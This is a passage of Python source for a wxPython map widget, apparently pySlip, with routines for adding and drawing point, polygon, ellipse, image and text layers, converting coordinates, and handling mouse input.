self.Bind(wx.EVT_MOUSEWHEEL, self.OnMouseWheel)
self.Bind(wx.EVT_ENTER_WINDOW, self.OnEnterWindow)
self.Bind(wx.EVT_LEAVE_WINDOW, self.OnLeaveWindow)
# OK, use the tile level the user wants
self.ZoomToLevel(self.level)
# set callback when parent resizes
self.onSizeCallback = self.ResizeCallback
# force a resize, which sets up the rest of the state
self.OnSize()
def OnEnterWindow(self, event):
"""Event handler when mouse enters widget."""
pass
def OnLeaveWindow(self, event):
"""Event handler when mouse leaves widget."""
self.RaiseMousePositionEvent(None)
######
# "add a layer" routines
######
def AddPointLayer(self, points, map_rel=True, visible=True,
show_levels=None, selectable=False,
name='<points_layer>', update=True, **kwargs):
"""Add a layer of points.
points iterable of point data:
(x, y, [attributes])
where x & y are either lon&lat (map) or x&y (view) coords
and attributes is an optional dictionary of attributes for
each point with keys like:
'placement' a placement string
'radius' radius of point in pixels
'colour' colour of point
'offset_x' X offset
'offset_y' Y offset
'data' point data object
map_rel points are map relative if True, else view relative
visible True if the layer is to be immediately visible
show_levels list of levels at which layer is auto-shown (or None)
selectable True if select operates on this layer
name the 'name' of the layer - mainly for debug
kwargs a layer-specific attributes dictionary, has keys:
'placement' a placement string
'radius' radius of point in pixels
'colour' colour of point
'offset_x' X offset
'offset_y' Y offset
'data' point data object
"""
# get global values
default_placement = kwargs.get('placement',
self.DefaultPointPlacement)
default_radius = kwargs.get('radius', self.DefaultPointRadius)
default_colour = self.get_i18n_kw(kwargs, ('colour', 'color'),
self.DefaultPointColour)
default_offset_x = kwargs.get('offset_x', self.DefaultPointOffsetX)
default_offset_y = kwargs.get('offset_y', self.DefaultPointOffsetY)
default_data = kwargs.get('data', self.DefaultPointData)
# create data iterable for draw method
draw_data = [] # list to hold draw data
for pt in points:
if len(pt) == 3:
(x, y, attributes) = pt
elif len(pt) == 2:
(x, y) = pt
attributes = {}
else:
msg = ('Points data must be iterable of tuples: '
'(x, y, [dict])\n'
'Got: %s' % str(pt))
raise Exception(msg)
# plug in any required layer defaults (override globals)
placement = attributes.get('placement', default_placement)
radius = attributes.get('radius', default_radius)
colour = self.get_i18n_kw(attributes, ('colour', 'color'),
default_colour)
offset_x = attributes.get('offset_x', default_offset_x)
offset_y = attributes.get('offset_y', default_offset_y)
data = attributes.get('data', default_data)
draw_data.append((x, y, placement.lower(),
radius, colour, offset_x, offset_y, data))
return self.AddLayer(kwargs.get("renderer",self.DrawPointLayer), draw_data, map_rel,
visible=visible, show_levels=show_levels,
selectable=selectable, name=name,
type=self.TypePoint, update=update)
def AddEllipseLayer(self, data, map_rel=True, visible=True,
show_levels=None, selectable=False,
name='<polygon_layer>', update=True, **kwargs):
# get global values, if required
default_placement = kwargs.get('placement',
self.DefaultPolygonPlacement)
default_width = kwargs.get('width', self.DefaultPolygonWidth)
default_colour = self.get_i18n_kw(kwargs, ('colour', 'color'),
self.DefaultPolygonColour)
default_close = kwargs.get('closed', self.DefaultPolygonClose)
default_filled = kwargs.get('filled', self.DefaultPolygonFilled)
default_fillcolour = self.get_i18n_kw(kwargs,
('fillcolour', 'fillcolor'),
self.DefaultPolygonFillcolour)
default_offset_x = kwargs.get('offset_x', self.DefaultPolygonOffsetX)
default_offset_y = kwargs.get('offset_y', self.DefaultPolygonOffsetY)
draw_data = []
for x in range(0,len(data),5):
# Calculate ellipse center, major and minor axes.
side1=col(( (data[x][0]+data[x+1][0])/2., (data[x][1]+data[x+1][1])/2.))
side2=col(( (data[x+1][0]+data[x+2][0])/2., (data[x+1][1]+data[x+2][1])/2.))
side3=col(( (data[x+2][0]+data[x+3][0])/2., (data[x+2][1]+data[x+3][1])/2.))
side4=col(( (data[x+3][0]+data[x+4][0])/2., (data[x+3][1]+data[x+4][1])/2.))
ellipse_center = (side1+side3)/2.
semimajor_axis = side3 - ellipse_center
semiminor_axis = side2 - ellipse_center
p = (ellipse_center.elems,
(semimajor_axis + ellipse_center).elems,
(semiminor_axis + ellipse_center).elems)
draw_data.append((p, default_placement.lower(),
default_width, default_colour, True,
default_filled, default_fillcolour,
default_offset_x, default_offset_y, None))
return self.AddLayer(self.DrawLightweightEllipticalSpline, draw_data, map_rel,
visible, show_levels=show_levels,
selectable=False, name=name,
type=self.TypeEllipse, update=update)
def DrawLightweightEllipticalSpline(self, dc, data, map_rel):
assert map_rel
# draw polygons on map/view
# Draw points on map/view, using transparency if implemented.
# No point in attempting to recover from the error below,
# because ellipses require a GraphicsContext.
try:
dc = wx.GCDC(dc)
except NotImplementedError:
return
(p, place, width, colour, closed,
filled, fillcolour, x_off, y_off, pdata) = data[0]
dc.SetPen(wx.Pen(colour, width=width))
if filled:
dc.SetBrush(wx.Brush(fillcolour))
else:
dc.SetBrush(wx.TRANSPARENT_BRUSH)
assert closed
assert x_off==0
assert y_off==0
# Ellipses can be convenintly rendered on a graphics context,
# but not on a generic device context.
gc = dc.GetGraphicsContext()
for (p, place, width, colour, closed,
filled, fillcolour, x_off, y_off, pdata) in data:
# Gather ellipse center, major and minor axes in view
# coordinates.
(ellipse_center, semimajor_axis, semiminor_axis) = [
self.ConvertGeo2View(lonlat) for lonlat in p]
major = col(semimajor_axis) - col(ellipse_center)
minor = col(semiminor_axis) - col(ellipse_center)
angle = math.atan2(major.elems[1], major.elems[0])
r_major = math.hypot(major.elems[0], major.elems[1])
r_minor = math.hypot(minor.elems[0], minor.elems[1])
gc.PushState()
gc.Translate(ellipse_center[0], ellipse_center[1])
gc.Rotate(angle)
gc.DrawEllipse(-r_major, -r_minor, 2 * r_major, 2 * r_minor)
gc.PopState()
def AddPolygonLayer(self, data, map_rel=True, visible=True,
show_levels=None, selectable=False,
name='<polygon_layer>', update=True, **kwargs):
"""Add a layer of polygon data to the map.
data iterable of polygon tuples:
(<iter>[, attributes])
where <iter> is another iterable of (x, y) tuples and
attributes is a dictionary of polygon attributes:
placement a placement string (view-relative only)
width width of polygon edge lines
colour colour of edge lines
close if True closes polygon
filled polygon is filled (implies closed)
fillcolour fill colour
offset_x X offset
offset_y Y offset
data polygon data object
map_rel points drawn relative to map if True, else view relative
visible True if the layer is to be immediately visible
show_levels list of levels at which layer is auto-shown (or None)
selectable True if select operates on this layer
name name of this layer
kwargs extra keyword args, layer-specific:
placement placement string (view-rel only)
width width of polygons in pixels
colour colour of polygon edge lines
close True if polygon is to be closed
filled if True, fills polygon
fillcolour fill colour
offset_x X offset
offset_y Y offset
"""
# get global values, if required
default_placement = kwargs.get('placement',
self.DefaultPolygonPlacement)
default_width = kwargs.get('width', self.DefaultPolygonWidth)
default_colour = self.get_i18n_kw(kwargs, ('colour', 'color'),
self.DefaultPolygonColour)
default_close = kwargs.get('closed', self.DefaultPolygonClose)
default_filled = kwargs.get('filled', self.DefaultPolygonFilled)
default_fillcolour = self.get_i18n_kw(kwargs,
('fillcolour', 'fillcolor'),
self.DefaultPolygonFillcolour)
default_offset_x = kwargs.get('offset_x', self.DefaultPolygonOffsetX)
default_offset_y = kwargs.get('offset_y', self.DefaultPolygonOffsetY)
# create draw_data iterable
draw_data = []
for d in data:
if len(d) == 2:
(p, attributes) = d
elif len(d) == 1:
p = d
attributes = {}
else:
msg = ('Polygon data must be iterable of tuples: '
'(poly, [attributes])\n'
'Got: %s' % str(d))
raise Exception(msg)
# get polygon attributes
placement = attributes.get('placement', default_placement)
width = attributes.get('width', default_width)
colour = self.get_i18n_kw(attributes, ('colour', 'color'),
default_colour)
close = attributes.get('closed', default_close)
filled = attributes.get('filled', default_filled)
if filled:
close = True
fillcolour = self.get_i18n_kw(attributes,
('fillcolour', 'fillcolor'),
default_fillcolour)
offset_x = attributes.get('offset_x', default_offset_x)
offset_y = attributes.get('offset_y', default_offset_y)
data = attributes.get('data', None)
# if polygon is to be filled, ensure closed
if close:
p = list(p)
p.append(p[0])
draw_data.append((p, placement.lower(), width, colour, close,
filled, fillcolour, offset_x, offset_y, data))
return self.AddLayer(self.DrawPolygonLayer, draw_data, map_rel,
visible=visible, show_levels=show_levels,
selectable=selectable, name=name,
type=self.TypePolygon, update=update)
def AddImageLayer(self, data, map_rel=True, visible=True,
show_levels=None, selectable=False,
name='<image_layer>', **kwargs):
"""Add a layer of images to the map.
data list of (lon, lat, fname[, attributes]) (map_rel)
or list of (x, y, fname, [attributes]) (view relative)
attributes is a dictionary of attribute keys:
placement a placement string
offset_x X offset
offset_y Y offset
data image data object
map_rel points drawn relative to map if True, else view relative
visible True if the layer is to be immediately visible
show_levels list of levels at which layer is auto-shown (or None)
selectable True if select operates on this layer
name name of this layer
kwargs dictionary of extra params:
placement string describing placement wrt hotspot
offset_x hotspot X offset in pixels
offset_y hotspot Y offset in pixels
The hotspot is placed at (lon, lat) or (x, y). 'placement' controls
where the image is displayed relative to the hotspot.
"""
# get global attribute values
default_placement = kwargs.get('placement',
self.DefaultImagePlacement)
default_offset_x = kwargs.get('offset_x', self.DefaultImageOffsetX)
default_offset_y = kwargs.get('offset_y', self.DefaultImageOffsetY)
# define cache variables for the image data
fname_cache = None
bmp_cache = None
w_cache = None
h_cache = None # used to optimize file access
# load all image files, convert to bitmaps, create draw_data iterable
draw_data = []
for d in data:
if len(d) == 4:
(lon, lat, fname, attributes) = d
elif len(d) == 3:
(lon, lat, fname) = d
attributes = {}
else:
msg = ('Points data must be iterable of tuples: '
'(x, y, [dict])\nGot: %s' % str(d))
raise Exception(msg)
placement = attributes.get('placement', default_placement)
offset_x = attributes.get('offset_x', default_offset_x)
offset_y = attributes.get('offset_y', default_offset_y)
data = attributes.get('data', None)
if fname == fname_cache:
bmap = bmp_cache
w = w_cache
h = h_cache
else:
fname_cache = fname
img = wx.Image(fname, wx.BITMAP_TYPE_ANY)
bmp_cache = bmap = img.ConvertToBitmap()
(w, h) = bmap.GetSize()
w_cache = w
h_cache = h
draw_data.append((lon, lat, bmap, w, h, placement.lower(),
offset_x, offset_y, data))
return self.AddLayer(self.DrawImageLayer, draw_data, map_rel,
visible=visible, show_levels=show_levels,
selectable=selectable, name=name,
type=self.TypeImage)
def AddTextLayer(self, text, map_rel=True, visible=True, show_levels=None,
selectable=False, name='<text_layer>', update=True, **kwargs):
"""Add a text layer to the map.
text list of sequence of (lon, lat, text, [dict]) coordinates
map_rel points drawn relative to map if True, else view relative
visible True if the layer is to be immediately visible
show_levels list of levels at which layer is auto-shown
selectable True if select operates on this layer
name name of this layer
kwargs a dictionary of changeable text attributes
(placement, radius, fontname, fontsize, colour, data)
these supply any data missing in 'data'
"""
if map_rel:
default_placement = kwargs.get('placement', self.DefaultTextPlacement)
default_radius = kwargs.get('radius', self.DefaultTextRadius)
default_fontname = kwargs.get('fontname', self.DefaultTextFontname)
default_fontsize = kwargs.get('fontsize', self.DefaultTextFontSize)
default_colour = self.get_i18n_kw(kwargs, ('colour', 'color'),
self.DefaultTextColour)
default_textcolour = self.get_i18n_kw(kwargs,
('textcolour', 'textcolor'),
self.DefaultTextTextColour)
default_offset_x = kwargs.get('offset_x', self.DefaultTextOffsetX)
default_offset_y = kwargs.get('offset_y', self.DefaultTextOffsetY)
default_data = kwargs.get('data', self.DefaultTextData)
else:
default_placement = kwargs.get('placement', self.DefaultTextViewPlacement)
default_radius = kwargs.get('radius', self.DefaultTextViewRadius)
default_fontname = kwargs.get('fontname', self.DefaultTextViewFontname)
default_fontsize = kwargs.get('fontsize', self.DefaultTextViewFontSize)
default_colour = self.get_i18n_kw(kwargs, ('colour', 'color'),
self.DefaultTextViewColour)
default_textcolour = self.get_i18n_kw(kwargs,
('textcolour', 'textcolor'),
self.DefaultTextViewTextColour)
default_offset_x = kwargs.get('offset_x', self.DefaultTextViewOffsetX)
default_offset_y = kwargs.get('offset_y', self.DefaultTextViewOffsetY)
default_data = kwargs.get('data', self.DefaultTextData)
# create data iterable ready for drawing
draw_data = []
for t in text:
if len(t) == 4:
(lon, lat, tdata, attributes) = t
elif len(t) == 3:
(lon, lat, tdata) = t
attributes = {}
else:
msg = ('Text data must be iterable of tuples: '
'(lon, lat, text, [dict])\n'
'Got: %s' % str(t))
raise Exception(msg)
# plug in any required defaults
placement = attributes.get('placement', default_placement)
radius = attributes.get('radius', default_radius)
fontname = attributes.get('fontname', default_fontname)
fontsize = attributes.get('fontsize', default_fontsize)
colour = self.get_i18n_kw(attributes, ('colour', 'color'),
default_colour)
textcolour = self.get_i18n_kw(attributes,
('textcolour', 'textcolor'),
default_textcolour)
offset_x = attributes.get('offset_x', default_offset_x)
offset_y = attributes.get('offset_y', default_offset_y)
data = attributes.get('data', default_data)
draw_data.append((lon, lat, tdata, placement.lower(),
radius, colour, textcolour, fontname, fontsize,
offset_x, offset_y, data))
return self.AddLayer(self.DrawTextLayer, draw_data, map_rel,
visible=visible, show_levels=show_levels,
selectable=selectable, name=name,
type=self.TypeText, update=update)
def AddLayer(self, render, data, map_rel, visible, show_levels,
selectable, name, type, update=True):
"""Add a generic layer to the system.
render the function used to render the layer
data actual layer data (depends on layer type)
map_rel True if points are map relative, else view relative
visible True if layer is to be immediately shown, else False
show_levels list of levels at which to auto-show the layer
selectable True if select operates on this layer
name name for this layer
type flag for layer 'type'
Returns unique ID of the new layer.
"""
# get layer ID
id = self.next_layer_id
self.next_layer_id += 1
# prepare the show_level value
if show_levels is None:
show_levels = range(self.min_level, self.max_level + 1)
# create layer, add unique ID to Z order list
l = _Layer(id=id, painter=render, data=data, map_rel=map_rel,
visible=visible, show_levels=show_levels,
selectable=selectable, name=name, type=type)
self.layer_mapping[id] = l
self.layer_z_order.append(id)
# force display of new layer if it's visible
if visible and update:
self.Update()
return id
######
# Layer manipulation routines.
######
def ShowLayer(self, id):
"""Show a layer.
id the layer id
"""
self.layer_mapping[id].visible = True
self.Update()
def HideLayer(self, id):
"""Hide a layer.
id the layer id
"""
self.layer_mapping[id].visible = False
self.Update()
def DeleteLayer(self, id, update=True):
"""Delete a layer.
id the layer id
"""
# just in case we got None
if id:
# see if what we are about to remove might be visible
visible = self.layer_mapping[id].visible
del self.layer_mapping[id]
self.layer_z_order.remove(id)
# if layer was visible, refresh display
if visible and update:
self.Update()
def SetLayerShowLevels(self, id, show_levels=None):
"""Update the show_levels list for a layer.
id ID of the layer we are going to update
show_levels new layer show list
"""
# just in case we got None
if id:
layer = self.layer_mapping[id]
# prepare the show_level value
if show_levels is None:
show_levels = range(self.min_level, self.max_level + 1)[:]
layer.show_levels = show_levels
# if layer was visible, refresh display
if visible:
self.Update()
def SetLayerSelectable(self, id, selectable=False):
"""Update the .selectable attribute for a layer.
id ID of the layer we are going to update
selectable new .selectable attribute value (True or False)
"""
# just in case we got None
if id:
layer = self.layer_mapping[id]
layer.selectable = selectable
######
# Play with layers Z order
######
def PushLayerToBack(self, id):
"""Make layer specified be drawn at back of Z order.
id ID of the layer to push to the back
"""
self.layer_z_order.remove(id)
self.layer_z_order.insert(0, id)
self.Update()
def PopLayerToFront(self, id):
"""Make layer specified be drawn at front of Z order.
id ID of the layer to pop to the front
"""
self.layer_z_order.remove(id)
self.layer_z_order.append(id)
self.Update()
def PlaceLayerBelowLayer(self, id, top_id):
"""Place a layer so it will be drawn behind another layer.
id ID of layer to place underneath 'top_id'
top_id ID of layer to be drawn *above* 'id'
"""
self.layer_z_order.remove(id)
i = self.layer_z_order.index(top_id)
self.layer_z_order.insert(i, id)
self.Update()
######
# Layer drawing routines
######
def LightweightDrawPointLayer2(self, dc, data, map_rel):
"""Draw a points layer.
dc the device context to draw on
data an iterable of point tuples:
(x, y, place, radius, colour, x_off, y_off, pdata)
map_rel points relative to map if True, MUST BE TRUE for lightweight
Assumes all points are the same colour, saving 100's of ms.
In contrast to LightweightDrawPointLayer, this function draws
rectangles or points (rather than circles) for performance reasons.
"""
assert map_rel is True
if len(data)==0: return
(lon, lat, place,
radius, colour, x_off, y_off, pdata) = data[0]
# draw points on map/view
if map_rel:
# GCDC device context permits antialiasing and transparent colors.
# But, signficant time savings by not allowing these features
# It's not clear that we actually want or use them anyway
#dc = wx.GCDC(dc) # allow transparent colours
dc.SetPen(wx.Pen(colour))
dc.SetBrush(wx.Brush(colour))
points = []
rectangles = []
if radius:
diameter = 2 * radius
for (lon, lat, place,
radius, colour, x_off, y_off, pdata) in data:
pt = self.ConvertGeo2ViewMasked((lon, lat))
if pt:
(x, y) = pt
if radius:
rectangles.append(
(x + x_off - radius, y + y_off - radius,
diameter, diameter))
else:
points.append((x + x_off, y + y_off))
if len(points):
dc.DrawPointList(points)
if len(rectangles):
dc.DrawRectangleList(rectangles)
def LightweightDrawPointLayer(self, dc, data, map_rel):
"""Draw a points layer.
dc the device context to draw on
data an iterable of point tuples:
(x, y, place, radius, colour, x_off, y_off, pdata)
map_rel points relative to map if True, MUST BE TRUE for lightweight
Assumes all points are the same colour, saving 100's of ms.
"""
assert map_rel is True
if len(data)==0: return
(lon, lat, place,
radius, colour, x_off, y_off, pdata) = data[0]
# draw points on map/view
if map_rel:
# GCDC device context permits antialiasing and transparent colors.
# But, signficant time savings by not allowing these features
# It's not clear that we actually want or use them anyway
#dc = wx.GCDC(dc) # allow transparent colours
dc.SetPen(wx.Pen(colour))
dc.SetBrush(wx.Brush(colour))
for (lon, lat, place,
radius, colour, x_off, y_off, pdata) in data:
pt = self.ConvertGeo2ViewMasked((lon, lat))
if pt:
(x, y) = pt
if radius:
dc.DrawCircle(x + x_off, y + y_off, radius)
def DrawPointLayer(self, dc, data, map_rel):
"""Draw a points layer.
dc the device context to draw on
data an iterable of point tuples:
(x, y, place, radius, colour, x_off, y_off, pdata)
map_rel points relative to map if True, else relative to view
"""
# draw points on map/view
if map_rel:
dc = wx.GCDC(dc) # allow transparent colours
for (lon, lat, place,
radius, colour, x_off, y_off, pdata) in data:
pt = self.ConvertGeo2ViewMasked((lon, lat))
if pt:
dc.SetPen(wx.Pen(colour))
dc.SetBrush(wx.Brush(colour))
(x, y) = pt
if radius:
dc.DrawCircle(x + x_off, y + y_off, radius)
else:
(dc_w, dc_h) = dc.GetSize()
dc_w2 = dc_w / 2
dc_h2 = dc_h / 2
dc_h -= 1
dc_w -= 1
dc = wx.GCDC(dc) # allow transparent colours
for (x, y, place, radius, colour, x_off, y_off, pdata) in data:
dc.SetPen(wx.Pen(colour))
dc.SetBrush(wx.Brush(colour))
exec(self.point_view_placement[place])
if radius:
dc.DrawCircle(x, y, radius)
def DrawPolygonLayer(self, dc, data, map_rel):
"""Draw a polygon layer.
dc the device context to draw on
data an iterable of polygon tuples:
(p, placement, width, colour, closed,
filled, fillcolour, offset_x, offset_y, data)
where p is an iterable of points: (x, y)
map_rel points relative to map if True, else relative to view
"""
# draw polygons on map/view
polygons = []
lines = []
pens = []
brushes = []
if map_rel:
# Draw points on map/view, using transparency if implemented.
try:
dc = wx.GCDC(dc)
except NotImplementedError:
pass
for (p, place, width, colour, closed,
filled, fillcolour, x_off, y_off, pdata) in data:
# gather all polygon points as view coords
p_lonlat = []
for lonlat in p:
(x, y) = self.ConvertGeo2View(lonlat)
if closed:
p_lonlat.append((x + x_off, y + y_off))
else:
p_lonlat.extend((x + x_off, y + y_off))
pens.append(wx.Pen(colour, width=width))
if filled:
brushes.append(wx.Brush(fillcolour))
else:
brushes.append(wx.TRANSPARENT_BRUSH)
if closed:
polygons.append(p_lonlat)
else:
lines.append(p_lonlat)
else:
(dc_w, dc_h) = dc.GetSize()
dc_w2 = dc_w / 2
dc_h2 = dc_h / 2
dc_w -= 1
dc_h -= 1
dc = wx.GCDC(dc) # allow transparent colours
for (p, place, width, colour, closed,
filled, fillcolour, x_off, y_off, pdata) in data:
# fetch the exec code, don't refetch for each point in polygon
place_exec = self.poly_view_placement[place]
pp = []
for (x, y) in p:
exec(place_exec)
if closed:
pp.append((x, y))
else:
pp.extend((x, y))
pens.append(wx.Pen(colour, width=width))
if filled:
brushes.append(wx.Brush(fillcolour))
else:
brushes.append(wx.TRANSPARENT_BRUSH)
if closed:
polygons.append(pp)
else:
lines.append(pp)
if len(lines):
dc.DrawLineList(lines, pens=pens)
if len(polygons):
dc.DrawPolygonList(polygons, pens=pens, brushes=brushes)
def DrawImageLayer(self, dc, images, map_rel):
"""Draw an image Layer on the view.
dc the device context to draw on
images a sequence of image tuple sequences
(x,y,bmap,w,h,placement,offset_x,offset_y,idata)
map_rel points relative to map if True, else relative to view
"""
# draw images on map/view
if map_rel:
for (lon, lat, bmap, w, h, place, x_off, y_off, idata) in images:
w2 = w / 2
h2 = h / 2
pt = self.ConvertGeo2ViewMasked((lon, lat))
if pt:
(x, y) = pt
exec(self.image_map_placement[place])
dc.DrawBitmap(bmap, x, y, False)
else:
(dc_w, dc_h) = dc.GetSize()
dc_w2 = dc_w / 2
dc_h2 = dc_h / 2
for (x, y, bmap, w, h, place, x_off, y_off, idata) in images:
w2 = w / 2
h2 = h / 2
exec(self.image_view_placement[place])
dc.DrawBitmap(bmap, x, y, False)
def DrawTextLayer(self, dc, text, map_rel):
"""Draw a text Layer on the view.
dc the device context to draw on
text a sequence of tuples:
(lon, lat, tdata, placement, radius, colour, fontname,
fontsize, offset_x, offset_y, tdata)
map_rel points relative to map if True, else relative to view
"""
if text is None:
return
# draw text on map/view
if map_rel:
dc = wx.GCDC(dc) # allow transparent colours
for t in text:
(lon, lat, tdata, place, radius, colour, textcolour,
fontname, fontsize, x_off, y_off, data) = t
# convert geo position to view (returns None if off-view)
pt = self.ConvertGeo2ViewMasked((lon, lat))
if pt:
(x, y) = pt
# set font characteristics
dc.SetPen(wx.Pen(colour))
dc.SetBrush(wx.Brush(colour))
dc.SetTextForeground(colour)
font = wx.Font(fontsize, wx.SWISS, wx.NORMAL, wx.NORMAL,
False, fontname)
dc.SetFont(font)
# draw hotpoint circle
if radius:
dc.DrawCircle(x, y, radius)
# place the text relative to hotpoint
(w, h, _, _) = dc.GetFullTextExtent(tdata)
w2 = w / 2
h2 = h / 2
exec(self.text_map_placement[place])
dc.SetTextForeground(textcolour)
dc.DrawText(tdata, x, y)
else:
# we need the size of the DC
(dc_w, dc_h) = dc.GetSize()
dc_w2 = dc_w / 2
dc_h2 = dc_h / 2
dc_w -= 1
dc_h -= 1
dc = wx.GCDC(dc) # allow transparent colours
for t in text:
# for each text element, get unpacked data
(x, y, tdata, place, radius, colour, textcolour,
fontname, fontsize, x_off, y_off, data) = t
# set font characteristics
dc.SetPen(wx.Pen(colour))
dc.SetBrush(wx.Brush(colour))
dc.SetTextForeground(colour)
font = wx.Font(fontsize, wx.SWISS, wx.NORMAL, wx.NORMAL,
False, fontname)
dc.SetFont(font)
# draw hotpoint circle - do placement with x & y zero
(save_x, save_y) = (x, y)
(w, h, w2, h2, x, y) = (0, 0, 0, 0, 0, 0)
exec(self.text_view_placement[place])
if radius:
dc.DrawCircle(x, y, radius)
(x, y) = (save_x, save_y)
# place the text relative to hotpoint
(w, h, _, _) = dc.GetFullTextExtent(tdata) # size of text
w2 = w / 2
h2 = h / 2
exec(self.text_view_placement[place])
dc.SetTextForeground(textcolour)
dc.DrawText(tdata, x, y)
######
# Positioning methods
######
def GotoPosition(self, posn):
"""Set view to centre on a position in the current level.
posn a tuple (lon,lat) to centre view on
"""
(lon, lat) = posn
x = (lon - self.map_llon) * self.ppd_x
y = (self.map_tlat - lat) * self.ppd_y
self.view_offset_x = x - self.view_width / 2
self.view_offset_y = y - self.view_height / 2
# set the left/right/top/bottom lon/lat extents
self.RecalcViewLonLatLimits()
self.Update()
def GotoLevelAndPosition(self, level, posn):
"""Goto a map level and set view to centre on a position.
level the map level to use
posn a tuple (lon,lat) to centre view on
Does nothing if we can't use desired level.
"""
if self.ZoomToLevel(level):
self.GotoPosition(posn)
def ZoomToArea(self, posn, size):
"""Set view to level and position to view an area.
posn a tuple (lon,lat) to centre view on
size a tuple (width,height) of area in degrees
Centre an area and zoom to view such that the area will fill
approximately 50% of width or height, whichever is greater.
Use the ppd_x and ppd_y values in the level 'tiles.info' file.
"""
# unpack area width/height (degrees)
(awidth, aheight) = size
# step through levels (smallest first) and check view size (degrees)
for l in self.tiles.levels:
level = l
(_, _, ppd_x, ppd_y) = self.tiles.getInfo(l)
view_deg_width = self.view_width / ppd_x
view_deg_height = self.view_height / ppd_y
# if area >= 50% of view, finished
if awidth >= view_deg_width / 2 or aheight >= view_deg_height / 2:
break
self.GotoLevelAndPosition(level, posn)
######
# Convert between geo and view coordinates
######
def ConvertGeo2View(self, lonlat):
"""Convert a geo (lon+lat) position to view pixel coords.
lonlat (longitude, latitude) of point
Return screen pixels coordinates of the point (x,y).
"""
(lon, lat) = lonlat
return ((lon - self.view_llon) * self.ppd_x,
(self.view_tlat - lat) * self.ppd_y)
def ConvertGeo2ViewMasked(self, lonlat):
"""Convert a geo (lon+lat) position to view pixel coords.
lonlat (longitude, latitude) of point
Return screen pixels coordinates of the point (x,y) or None
if point is off-view.
"""
(lon, lat) = lonlat
if (self.view_llon <= lon <= self.view_rlon and
self.view_blat <= lat <= self.view_tlat):
return self.ConvertGeo2View(lonlat)
return None
def ConvertView2Geo(self, xy):
"""Convert an x,y view position to geo lon+lat.
xy tuple of view X & Y coordinate (pixels)
Return a tuple (lon, lat) - geo coordinates of the point.
"""
(x, y) = xy
# x_pix is from left map edge, y_pix from top map edge
x_pix = x + self.view_offset_x
y_pix = y + self.view_offset_y
lon = self.map_llon + x_pix / self.ppd_x
lat = self.map_tlat - y_pix / self.ppd_y
return (lon, lat)
######
# GUI stuff
######
def OnMove(self, event):
"""Handle a mouse move (map drag or rectangle select).
event the mouse move event
If SHIFT key is down, do rectangle select.
Otherwise pan the map if we are dragging.
"""
# for windows, set focus onto pyslip window
# linux seems to do this automatically
if sys.platform == 'win32' and self.FindFocus() != self:
self.SetFocus()
# get current mouse position
(x, y) = event.GetPositionTuple() if WX3 else event.GetPosition()
self.RaiseMousePositionEvent((x, y))
if event.Dragging() and event.LeftIsDown():
# are we doing box select?
if self.is_box_select:
# set select box point 2 at mouse position
(self.sbox_w, self.sbox_h) = (x - self.sbox_1_x,
y - self.sbox_1_y)
elif not self.last_drag_x is None:
# no, just a map drag
self.was_dragging = True
dx = self.last_drag_x - x
dy = self.last_drag_y - y
# move the map in the view
self.view_offset_x += dx
self.view_offset_y += dy
# adjust remembered X,Y
self.last_drag_x = x
self.last_drag_y = y
self.RecalcViewLonLatLimits()
# redraw client area
self.Update()
def OnLeftDown(self, event):
"""Left mouse button down. Prepare for possible drag."""
click_posn = event.GetPositionTuple() if WX3 else event.GetPosition()
if event.ShiftDown():
self.is_box_select = True
self.SetCursor(wx.StockCursor(wx.CURSOR_CROSS))
(self.sbox_w, self.sbox_h) = (0, 0)
(self.sbox_1_x, self.sbox_1_y) = click_posn
else:
self.is_box_select = False
self.SetCursor(wx.StockCursor(wx.CURSOR_HAND))
(self.last_drag_x, self.last_drag_y) = click_posn
event.Skip()
def OnLeftUp(self, event):
"""Left mouse button up.
Note that when we iterate through the layer_z_order list we must
iterate on a *copy* as the user select process can modify
self.layer_z_order.
"""
self.last_drag_x = self.last_drag_y = None
if self.ignore_next_up:
self.ignore_next_up = False
return
self.SetCursor(wx.StockCursor(wx.CURSOR_DEFAULT))
# we need a repaint to remove any selection box, but NOT YET!
delayed_paint = self.sbox_1_x # True if box select active
# if any layers interested, inform of possible select
if not self.was_dragging:
if self.is_box_select:
# possible box selection
ll_corner_v = (self.sbox_1_x, self.sbox_1_y)
tr_corner_v = (self.sbox_1_x + self.sbox_w,
self.sbox_1_y + self.sbox_h)
ll_corner_m = self.ConvertView2Geo(ll_corner_v)
tr_corner_m = self.ConvertView2Geo(tr_corner_v)
# check each layer for a box select event
# we work on a copy as user response could change order
for id in self.layer_z_order[:]:
l = self.layer_mapping[id]
# if layer visible and selectable
if l.selectable and l.visible:
if l.map_rel:
# map-relative, get all points selected (if any)
p_data = self.layerBSelHandler[l.type](l,
ll_corner_m,
tr_corner_m)
else:
# view-relative
p_data = self.layerBSelHandler[l.type](l,
ll_corner_v,
tr_corner_v)
self.RaiseSelectEvent(EventBoxSelect, l, p_data)
# user code possibly updated screen
delayed_paint = True
self.is_box_select = False
else:
# possible point selection
clickpt_v = event.GetPositionTuple() if WX3 else event.GetPosition()
clickpt_m = self.ConvertView2Geo(clickpt_v)
# check each layer for a point select callback
# we work on a copy as user callback could change order
for id in self.layer_z_order[:]:
l = self.layer_mapping[id]
# if layer visible and selectable
if l.selectable and l.visible and \
(l.type in self.layerPSelHandler):
if l.map_rel:
p_data = self.layerPSelHandler[l.type](l,
clickpt_m)
else:
p_data = self.layerPSelHandler[l.type](l,
clickpt_v)
self.RaiseSelectEvent(EventPointSelect, l, p_data,
vposn=clickpt_v,
mposn=clickpt_m)
# user code possibly updated screen
delayed_paint = True
# turn off drag
self.was_dragging = False
# turn off box selection mechanism
self.is_box_select = False
self.sbox_1_x = self.sbox_1_y = None
# force PAINT event if required
if delayed_paint:
self.Update()
def OnLeftDClick(self, event):
"""Left mouse button double-click.
Zoom in (if possible).
Zoom out (if possible) if shift key is down.
"""
# ignore next Left UP event
self.ignore_next_up = True
# TODO: should ignore double-click off the map, but within view
# a possible workaround is to limit minimum view level
# get view coords of mouse double click, want same centre afterwards
xy = event.GetPositionTuple() if WX3 else event.GetPosition()
if event.ShiftDown():
# zoom out if shift key also down
if self.ZoomToLevel(self.level - 1):
self.ZoomOut(xy)
else:
# zoom in
if self.ZoomToLevel(self.level + 1):
self.ZoomIn(xy)
# Raise position event to update the status text.
self.RaiseMousePositionEvent(xy)
def OnMiddleDown(self, event):
"""Middle mouse button down. Do nothing in this version."""
pass
def OnMiddleUp(self, event):
"""Middle mouse button up. Do nothing in this version."""
pass
def OnRightDown(self, event):
"""Right mouse button down. Prepare for right select (no drag)."""
click_posn = event.GetPositionTuple() if WX3 else event.GetPosition()
if event.ShiftDown():
self.is_box_select = True
